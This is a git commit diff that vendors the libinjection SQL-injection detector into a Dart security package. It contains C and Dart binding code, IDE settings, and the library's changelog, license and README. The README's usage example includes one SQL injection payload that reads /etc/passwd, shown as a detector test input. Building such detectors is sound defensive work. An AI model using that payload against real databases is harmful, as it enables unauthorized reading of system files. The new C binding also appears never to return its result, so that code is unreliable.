Roll libinjection

This commit is contained in:
Tobe O 2019-08-16 10:42:40 -04:00
parent 7c3a81ffd4
commit 17224d011a
623 changed files with 211930 additions and 10 deletions

View file

@ -1,26 +1,313 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="CMakeRunConfigurationManager" shouldGenerate="true" shouldDeleteObsolete="true">
<generated>
<config projectName="angel_security" targetName="angel_security_native" />
<config projectName="angel_security" targetName="injection" />
</generated>
</component>
<component name="CMakeSettings">
<configurations>
<configuration PROFILE_NAME="Debug" CONFIG_NAME="Debug" />
</configurations>
</component>
<component name="ChangeListManager">
<list default="true" id="196df338-9e5c-49f9-ba32-c75ccea34c48" name="Default Changelist" comment="">
<change afterPath="$PROJECT_DIR$/libinjection/src/CMakeLists.txt" afterDir="false" />
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
<change beforePath="$PROJECT_DIR$/CMakeLists.txt" beforeDir="false" afterPath="$PROJECT_DIR$/CMakeLists.txt" afterDir="false" />
<change beforePath="$PROJECT_DIR$/cmake_dart_utils" beforeDir="false" afterPath="$PROJECT_DIR$/cmake_dart_utils" afterDir="false" />
<change beforePath="$PROJECT_DIR$/cmake_dart_utils/example/lib/sample_extension.dart" beforeDir="false" afterPath="$PROJECT_DIR$/cmake_dart_utils/example/lib/sample_extension.dart" afterDir="false" />
<change beforePath="$PROJECT_DIR$/lib/src/native/angel_security.cc" beforeDir="false" afterPath="$PROJECT_DIR$/lib/src/native/angel_security.c" afterDir="false" />
<change beforePath="$PROJECT_DIR$/lib/src/native/native.dart" beforeDir="false" afterPath="$PROJECT_DIR$/lib/src/native/native.dart" afterDir="false" />
</list>
<ignored path="$PROJECT_DIR$/cmake-build-debug/" />
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
<option name="SHOW_DIALOG" value="false" />
<option name="HIGHLIGHT_CONFLICTS" value="true" />
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
<option name="LAST_RESOLUTION" value="IGNORE" />
</component>
<component name="ExecutionTargetManager" SELECTED_TARGET="CMakeBuildProfile:Debug" />
<component name="FileEditorManager">
<leaf>
<file pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/lib/src/native/angel_security.c">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="207">
<caret line="44" column="45" selection-start-line="44" selection-start-column="45" selection-end-line="44" selection-end-column="45" />
<folding>
<element signature="e#0#21#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file pinned="false" current-in-tab="false">
<entry file="file:///usr/local/Cellar/dart/2.5.0-dev.1.0/libexec/include/dart_api.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="142">
<caret line="2046" column="24" selection-start-line="2046" selection-start-column="24" selection-end-line="2046" selection-end-column="24" />
</state>
</provider>
</entry>
</file>
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/libinjection/src/CMakeLists.txt">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="17">
<caret line="1" column="19" selection-start-line="1" selection-start-column="19" selection-end-line="1" selection-end-column="19" />
</state>
</provider>
</entry>
</file>
</leaf>
</component>
<component name="Git.Settings">
<option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
</component>
<component name="IdeDocumentHistory">
<option name="CHANGED_PATHS">
<list>
<option value="$PROJECT_DIR$/lib/src/native/angel_security.cc" />
<option value="$PROJECT_DIR$/CMakeLists.txt" />
<option value="$PROJECT_DIR$/libinjection/src/CMakeLists.txt" />
<option value="$PROJECT_DIR$/lib/src/native/angel_security.c" />
</list>
</option>
</component>
<component name="ProjectFrameBounds">
<option name="x" value="180" />
<option name="y" value="23" />
<option name="width" value="1155" />
<option name="height" value="766" />
</component>
<component name="ProjectLevelVcsManager" settingsEditedManually="true" />
<component name="ProjectView">
<navigator proportions="" version="1">
<foldersAlwaysOnTop value="true" />
</navigator>
<panes>
<pane id="Scope" />
<pane id="ProjectPane">
<subPane>
<expand>
<path>
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
<item name="security" type="462c0819:PsiDirectoryNode" />
</path>
<path>
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
<item name="security" type="462c0819:PsiDirectoryNode" />
<item name="lib" type="462c0819:PsiDirectoryNode" />
</path>
<path>
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
<item name="security" type="462c0819:PsiDirectoryNode" />
<item name="lib" type="462c0819:PsiDirectoryNode" />
<item name="src" type="462c0819:PsiDirectoryNode" />
</path>
<path>
<item name="angel_security" type="b2602c69:ProjectViewProjectNode" />
<item name="security" type="462c0819:PsiDirectoryNode" />
<item name="lib" type="462c0819:PsiDirectoryNode" />
<item name="src" type="462c0819:PsiDirectoryNode" />
<item name="native" type="462c0819:PsiDirectoryNode" />
</path>
</expand>
<select />
</subPane>
</pane>
</panes>
</component>
<component name="PropertiesComponent">
<property name="SHARE_PROJECT_CONFIGURATION_FILES" value="true" />
<property name="WebServerToolWindowFactoryState" value="false" />
<property name="cf.advertisement.text.overridden" value="true" />
<property name="nodejs_interpreter_path.stuck_in_default_project" value="undefined stuck path" />
<property name="nodejs_npm_path_reset_for_default_project" value="true" />
<property name="settings.editor.selected.configurable" value="project.propVCSSupport.Mappings" />
</component>
<component name="RunManager">
<component name="RunDashboard">
<option name="ruleStates">
<list>
<RuleState>
<option name="name" value="ConfigurationTypeDashboardGroupingRule" />
</RuleState>
<RuleState>
<option name="name" value="StatusDashboardGroupingRule" />
</RuleState>
</list>
</option>
</component>
<component name="RunManager" selected="CMake Application.angel_security_native">
<configuration name="angel_security_native" type="CMakeRunConfiguration" factoryName="Application" PASS_PARENT_ENVS_2="true" PROJECT_NAME="angel_security" TARGET_NAME="angel_security_native" CONFIG_NAME="Debug">
<method v="2">
<option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
</method>
</configuration>
<configuration name="injection" type="CMakeRunConfiguration" factoryName="Application" PASS_PARENT_ENVS_2="true" PROJECT_NAME="angel_security" TARGET_NAME="injection" CONFIG_NAME="Debug">
<method v="2">
<option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
</method>
</configuration>
<list>
<item itemvalue="CMake Application.angel_security_native" />
<item itemvalue="CMake Application.injection" />
</list>
</component>
<component name="SvnConfiguration">
<configuration />
</component>
<component name="TaskManager">
<task active="true" id="Default" summary="Default task">
<changelist id="196df338-9e5c-49f9-ba32-c75ccea34c48" name="Default Changelist" comment="" />
<created>1565965399486</created>
<option name="number" value="Default" />
<option name="presentableId" value="Default" />
<updated>1565965399486</updated>
<workItem from="1565965401738" duration="952000" />
</task>
<servers />
</component>
<component name="TimeTrackingManager">
<option name="totallyTimeSpent" value="952000" />
</component>
<component name="ToolWindowManager">
<frame x="180" y="23" width="1155" height="766" extended-state="0" />
<editor active="true" />
<layout>
<window_info id="Favorites" side_tool="true" />
<window_info content_ui="combo" id="Project" order="0" weight="0.2884097" />
<window_info id="Structure" order="1" side_tool="true" weight="0.25" />
<window_info anchor="bottom" id="Tool Output" />
<window_info anchor="bottom" id="Database Changes" />
<window_info anchor="bottom" id="Version Control" />
<window_info anchor="bottom" id="Terminal" />
<window_info active="true" anchor="bottom" id="Messages" visible="true" weight="0.32937685" />
<window_info anchor="bottom" id="Event Log" side_tool="true" />
<window_info anchor="bottom" id="ANTLR Preview" />
<window_info anchor="bottom" id="CMake" weight="0.32937685" />
<window_info anchor="bottom" id="Message" order="0" />
<window_info anchor="bottom" id="Find" order="1" />
<window_info anchor="bottom" id="Run" order="2" />
<window_info anchor="bottom" id="Debug" order="3" weight="0.4" />
<window_info anchor="bottom" id="Cvs" order="4" weight="0.25" />
<window_info anchor="bottom" id="Inspection" order="5" weight="0.4" />
<window_info anchor="bottom" id="TODO" order="6" />
<window_info anchor="right" id="Database" />
<window_info anchor="right" id="make" />
<window_info anchor="right" id="Commander" order="0" weight="0.4" />
<window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
</layout>
</component>
<component name="TypeScriptGeneratedFilesManager">
<option name="version" value="1" />
</component>
<component name="VcsManagerConfiguration">
<ignored-roots>
<path value="$PROJECT_DIR$/libinjection" />
</ignored-roots>
</component>
<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_xss.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="204">
<caret line="12" lean-forward="true" selection-start-line="12" selection-end-line="12" />
<folding>
<element signature="e#251#252#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_xss.c">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="162">
<caret line="24" lean-forward="true" selection-start-line="24" selection-end-line="24" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_html5.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="124">
<caret line="32" column="16" lean-forward="true" selection-start-line="32" selection-start-column="16" selection-end-line="32" selection-end-column="16" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/lib/src/native/native.dart">
<provider selected="true" editor-type-id="text-editor" />
</entry>
<entry file="file://$PROJECT_DIR$/CMakeLists.txt">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="136">
<caret line="8" column="53" selection-start-line="8" selection-start-column="53" selection-end-line="8" selection-end-column="53" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_sqli.c">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="188">
<caret line="19" lean-forward="true" selection-start-line="19" selection-end-line="19" />
<folding>
<element signature="e#158#177#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_sqli_data.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="51">
<caret line="3" lean-forward="true" selection-start-line="3" selection-end-line="3" />
<folding>
<element signature="e#68#93#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection_sqli.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="255">
<caret line="15" lean-forward="true" selection-start-line="15" selection-end-line="15" />
<folding>
<element signature="e#235#247#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/libinjection.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="153">
<caret line="9" column="22" lean-forward="true" selection-start-line="9" selection-start-column="22" selection-end-line="9" selection-end-column="22" />
<folding>
<element signature="e#223#311#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/libinjection/src/CMakeLists.txt">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="17">
<caret line="1" column="19" selection-start-line="1" selection-start-column="19" selection-end-line="1" selection-end-column="19" />
</state>
</provider>
</entry>
<entry file="file:///usr/local/Cellar/dart/2.5.0-dev.1.0/libexec/include/dart_api.h">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="142">
<caret line="2046" column="24" selection-start-line="2046" selection-start-column="24" selection-end-line="2046" selection-end-column="24" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/lib/src/native/angel_security.c">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="207">
<caret line="44" column="45" selection-start-line="44" selection-start-column="45" selection-end-line="44" selection-end-column="45" />
<folding>
<element signature="e#0#21#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</component>
</project>

View file

@ -3,4 +3,8 @@ project(angel_security)
set(CMAKE_EXPORT_COMPILE_COMMANDS ON)
list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_LIST_DIR}/cmake_dart_utils/cmake")
find_package(Dart REQUIRED)
add_dart_native_extension(angel_security_native lib/src/native/angel_security.cc)
include_directories(libinjection/src)
add_subdirectory(libinjection/src)
add_dart_native_extension(angel_security_native lib/src/native/angel_security.c)
target_link_libraries(angel_security_native injection)
install(TARGETS angel_security_native LIBRARY DESTINATION "${CMAKE_CURRENT_LIST_DIR}/lib/src")

View file

@ -1,4 +1,7 @@
#include <dart_api.h>
#include <libinjection.h>
#include <libinjection_sqli.h>
#include <stdbool.h>
#include <string.h>
Dart_NativeFunction ResolveName(Dart_Handle name, int argc,
@ -23,10 +26,24 @@ Dart_Handle HandleError(Dart_Handle handle) {
}
void Angel_Security_IsSqli(Dart_NativeArguments arguments) {
char* text;
HandleError();
Dart_Handle result = HandleError(Dart_NewInteger(rand()));
Dart_SetReturnValue(arguments, result);
const char *text;
Dart_Handle textHandle = Dart_GetNativeArgument(arguments, 0);
HandleError(Dart_StringToCString(textHandle, &text));
struct libinjection_sqli_state state;
libinjection_sqli_init(&state, text, strlen(text), FLAG_NONE);
int is_sqli = libinjection_is_sqli(&state);
// Return list
Dart_Handle outHandle = Dart_NewList(2);
if (is_sqli != 0) {
HandleError(Dart_ListSetAt(outHandle, 0, Dart_NewBoolean(true)));
HandleError(Dart_ListSetAt(outHandle, 1,
Dart_NewStringFromCString(state.fingerprint)));
} else {
HandleError(Dart_ListSetAt(outHandle, 0, Dart_NewBoolean(false)));
HandleError(Dart_ListSetAt(outHandle, 1, Dart_Null()));
}
}
Dart_NativeFunction ResolveName(Dart_Handle name, int argc,

View file

@ -1,5 +1,3 @@
import 'dart-ext:angel_security_native';
/// Using `libinjection`, determines whether a string contains
/// a SQL injection.
bool isSqli(String text) native "Angel_Security_IsSqli";
import 'package:angel_framework/angel_framework.dart';
part 'sqli.dart';

17
lib/src/native/sqli.dart Normal file
View file

@ -0,0 +1,17 @@
part of 'native.dart';
List _isSqli(String text) native "Angel_Security_IsSqli";
/// Using `libinjection`, determines whether a string contains
/// a SQL injection.
LibInjectionScore sqlInjectionScore(String text) {
var result = _isSqli(text);
return LibInjectionScore(result[0] as bool, result[1] as String);
}
class LibInjectionScore {
final bool isInjection;
final String signature;
LibInjectionScore(this.isInjection, [this.signature]);
}

46
libinjection/.gitignore vendored Normal file
View file

@ -0,0 +1,46 @@
*~
*.pyc
*.dSYM
c/#*
*.plist
*.info
*.gch
*.gcov
# gnu autotest
*.trs
#aclocal.m4
app.info
autom4te.cache
#compile
config.h
#config.h.in
#config.guess
config.log
config.status
#config.sub
#configure
configure.scan
coverage_report
#depcomp
#install-sh
#libtool
#ltmain.sh
#Makefile.in
#m4
#missing
stamp-h1
*~
*.html
*.log
*.o
*.la
*.so*
*.a
.deps
*.tar*
*.zip
*.lo
*.gcno
*.gcda

14
libinjection/.travis.yml Normal file
View file

@ -0,0 +1,14 @@
sudo: required
dist: trusty
language: generic
services:
- docker
before_install:
- docker pull nickg/libinjection-docker
script:
- docker run -e COVERALLS_REPO_TOKEN=$COVERALLS_REPO_TOKEN -v $HOME/build/client9/libinjection:/build -w /build nickg/libinjection-docker ./make-ci.sh

2
libinjection/CHANGELOG Normal file
View file

@ -0,0 +1,2 @@
see CHANGELOG.md

288
libinjection/CHANGELOG.md Normal file
View file

@ -0,0 +1,288 @@
# NEXT
* [#126](/client9/libinjection/issues/126) oracle false negative
* [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS
* [#112](/client9/libinjection/issues/112) fix shared library on macOS
* [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS
* [#113](/client9/libinjection/issues/113) save space in struct
* [#126](/client9/libinjection/issues/126) add usage to sqli cli tool
* [#125](/client9/libinjection/issues/125) many false positives
* [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation
# v3.9.2 - 2016-05-21
* Release of whatever changes have been made over the last 2.5 years.
# v3.9.1 - 2013-12-26
Day-After-Christmas Edition
* No functional changes
* Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD
* For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux
* Other minor style changes to header files.
# v3.9.0 - 2013-11-29
Black Friday Edition
* Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h`
* Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well.
* Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally.
* Over 400 unit tests now!
* Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke.
* PHP documentation fixes, thanks @LightOS
# v3.8.0 - 2013-10-18
LAMP Special Edition: MySQL and PHP improvements
* [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r)
* Fixes to Lua testdriver and portability fixes
* Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module.
* API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases.
NOTE:
Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem.
Here's why:
* Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0.
* In addition, I've received a number of reports of generated code failing various static analysis
* I can't triangulate which SWIG for which language for which OS will work for you
* I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways.
# v3.7.1 -- 2013-10-13
* Remove un-needed code
# v3.7.0 -- 2013-10-13
Major Release
* [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub)
* Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives.
* [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel)
* [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily)
* Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems
Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html
* Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)`
* Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
# v3.6.0 -- 2013-09-11
* New PHP API
* Big fingerprint update
** about 500 new fingerprints added based on fuzzing tests by Reto Ischi
** about 700 impossible, dead fingerprints removed
** adding folding rule for "sqltype sqltype -> sqltype" since
`select binary binary binary 1` is valid
* Other minor fingerprints added
* -maybe- API change as typedefs and structs were re-arranged for SWIG
# v3.5.3 -- 2013-08-25
* Fingerprint update -- `BETWEEN` operation bypasses
* Fingerprint update -- `ANY/SOME` quasi-function bypasses
* Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1`
* Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
* More adjustments to the PHP/MYSQL backtick to reduce false positives
# v3.5.2 -- 2013-08-21
* Fingerprint update. Credit: Reto Ischi
# v3.5.1 -- 2013-08-21
* found regression in handling of PHP/MySQL backticks. Tests added
* Dead code removed.
* Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
# v3.5.0 -- 2013-08-21
* Bug fix for libinjection_sqli_reset @brianrectanus
https://github.com/client9/libinjection/pull/50
* Non-critical parser fix for numbers with oracle's ending
suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not
(SELECT, 1F, ROM)
* Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS
* Better parsing of generated number forms of "10.e" and "10.10e"
(these are actually table specifiers!) HT @LightOS
* Change sizing of some static arrays to have a length >= 8
For GCC based applications, this allows -fstack-protector to work
and -Wstack-protector will now not emit errors.
* Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS.
About 10% performance loss with -fstack-protector-all
* Improvements in reducing false positives, HT modsecurity team
* Add fingerprint, HT @FluxReiners
* Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL)
* Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..."
* Fi possible stack over-read, and improve detection of "sp_password" flag
in short sqli HT modsecurity team
# v3.4.1 2013-07-18
* Fingerprint update only HT @LightOS
# v3.4.0 2013-07-18
* Fix regression with COLLATE
* Handle "procedure analyze" under MySQL
* Make API most robust when setting flags
* Add folding API
* Add new all-C test driver to improve testing speed
* Makefile cleanups
* Fired Jenkins! Using in-house system.
* Fixed bypass reported by @FluxReiners
# v3.3.0 2013-07-13
* change how backslash is handled to catch old MSSQL servers sqli
See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
for details
* Reworking of COLLATE to handle MySQL, TSQL types automatically
* Handle bizarro world TSQL '\%1' which is parsed as "0 % 1"
* Better stacked query detection, fixing some regressions
* Folding improvements
* False positive improvements
# v3.2.0 2013-07-12
* Parse binary litterals "0b010101" used by at least mysql and pgsql
* Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules
"-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS
* Add parsing rules for COLLATION in MySQL, CREDIT @LightOS
* Reduce false positives by removing all fingerprints that contained "sn"
* Improvement in handling MySQL 'binary' quasi-operator/type
* Improvements in folding
* Removed dependency on SWIG for installing python module
# v3.1.0 2013-07-02
* Fix for parsing Oracle numeric literals
* Fix for oracle whitespace with null char.
* Add unusual SQL join types to keywords lists
* Minor fixes to python API examples
# v3.0.0 2013-06-23
Big Release and Big Engine change. Highly recommend
* Numerous evasions and false positives fixed!
* Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`.
* Folding engine completely rewritten to be simpler and easier to extend, debug, port.
* MySQL `backticks` now handled correctly
* @"var" and @'var' parsed correctly (mysql)
* ":=" operator parsed correctly
* non-ascii SQL variables and barewords handled correctly
* less false positives and those that are false positives
are more "indeterminate cases" and are only in a few
fingerprints
* autogeneration of fingerprints with trivial SQL variations
* support for pgsql $ strings
* support for oracle's q and nq strings
* support for mysql's n strings
* parsing stats exposed
* new swig bindings for python and lua, with callbacks into original scripting
language for accept/reject of fingerprints (i.e. manage fingerprints in
script, not C code)
* Improved parsing of various special cases in MySQL
* Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately.
* Probably a bunch of other stuff too
# v2.0.4 2013-05-21 IMPORTANT
All users are advised to upgrade due to risk of DOS
## security
* more fingerprints, more tests
* Issue 34: fix infinite loop
# v2.0.3 2013-05-21
## security
* Add variations on '1U(((', thanks @LightOS
* Add automatically all variations on other cases of
'parens padding'
# v2.0.2 2013-05-21
## security
* Added fingerprint 'nU(kn' and variations, thanks to
discussion with @ModSecurity .
# v2.0.1 2013-05-21
## security
* Added fingerprint knknk, thanks @d0znpp
# v2.0.0 2013-05-17
Version 2 is more a software engineering release than SQLi.
The API, the code, and filenames are improved for embedded
use. Please see the README.md file for details on use.
## security
* Fix Issue30: detection of more small sqli forms with fingerprint "1c".
* Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus
## API Changes
BIG CHANGES
* File name changes. These are the only relevant files:
* `c/libinjection.h`
* `c/libinjection_sqli.c`
* `c/libinjection_sqli_data.h`
* `COPYING`
* Just need to include `libinjection.h` and link with `libinjection_sqli_.c`
* `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated.
Only use `#include "libinjection.h"`
* API name changes `is_sqli` and `is_string_sqli` are now
`libinjection_is_sqli` and `libinjection_is_string_sqli`
* API change, `libinjection_is_sqli` now takes a 5th arg for callback data
* API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5
in which case, a default lookup of fingerprints is used.
* `sqlmap_data.json` now includes fingerprint information, so people making
ports only need to parse one file.
## other
* Allow `clang` compiler (also in Jenkins, a build with clang and
make-scan is done)
* Optimizations should result in > 10% performance improvement
for normal workloads
* Add `sqlite3` special functions and keywords (since why not)
# v1.2.0 2013-05-06
## security
* fix regression in detecting SQLi of type '1c'
##
* improved documentation, comments, edits.
# v1.1.0 2013-05-04
## security
* Fix for nested c-style comments used by postgresql and transact-sql.
Thanks to @Kanatoko for the report.
* Numerous additions to SQL functions lists (in particular pgsql, transact-sql
and ms-access functions)
Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error.
Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-)
* Adding of fingerprints to detect HPP attacks.
* Algorihmically added new fingerprints to detect new _future_ sqli attacks. All of these
new fingerprints have no been seen 'in the wild' yet.
## other
* Replaced BSD memmem with optimzed version. This eliminates all 3rd party code.
* Added alpha python module (python setup.py install)
* Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding.
* Added version number in sqlparse.h, based on
http://www.python.org/dev/peps/pep-0386/#normalizedversion
# v1.0.0 2013-04-24
* retroactive initial release
* all memory issues fixed

32
libinjection/COPYING Normal file
View file

@ -0,0 +1,32 @@
Copyright (c) 2012-2016, Nick Galbreath
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
https://github.com/client9/libinjection
http://opensource.org/licenses/BSD-3-Clause

109
libinjection/README.md Normal file
View file

@ -0,0 +1,109 @@
[![Build Status](https://travis-ci.org/client9/libinjection.svg?branch=master)](https://travis-ci.org/client9/libinjection)
[![Coverage Status](https://coveralls.io/repos/client9/libinjection/badge.svg?branch=master&service=github)](https://coveralls.io/github/client9/libinjection?branch=master) [![license](https://img.shields.io/badge/license-BSD_3--Clause-blue.svg?style=flat)](https://raw.githubusercontent.com/client9/libinjection/master/COPYING)
libinjection
============
SQL / SQLI tokenizer parser analyzer. For
* C and C++
* [PHP](https://libinjection.client9.com/doc-sqli-php)
* [Python](https://libinjection.client9.com/doc-sqli-python)
* [Lua](/lua)
* [Java](https://github.com/jeonglee/Libinjection) (external port)
* [LuaJIT/FFI] (https://github.com/p0pr0ck5/lua-ffi-libinjection) (external port)
See
[https://www.client9.com/](https://www.client9.com/)
for details and presentations.
Simple example:
```c
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include "libinjection.h"
#include "libinjection_sqli.h"
int main(int argc, const char* argv[])
{
struct libinjection_sqli_state state;
int issqli;
const char* input = argv[1];
size_t slen = strlen(input);
/* in real-world, you would url-decode the input, etc */
libinjection_sqli_init(&state, input, slen, FLAG_NONE);
issqli = libinjection_is_sqli(&state);
if (issqli) {
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
}
return issqli;
}
```
```
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
sqli detected with fingerprint of 's&1UE'
```
More advanced samples:
* [sqli_cli.c](/src/sqli_cli.c)
* [reader.c](/src/reader.c)
* [fptool](/src/fptool.c)
VERSION INFORMATION
===================
See [CHANGELOG](/CHANGELOG) for details.
Versions are listed as "major.minor.point"
Major are significant changes to the API and/or fingerprint format.
Applications will need recompiling and/or refactoring.
Minor are C code changes. These may include
* logical change to detect or suppress
* optimization changes
* code refactoring
Point releases are purely data changes. These may be safely applied.
QUALITY AND DIAGNOSITICS
========================
The continuous integration results at
https://travis-ci.org/client9/libinjection tests the following:
- [x] build and unit-tests under GCC
- [x] build and unit-tests under Clang
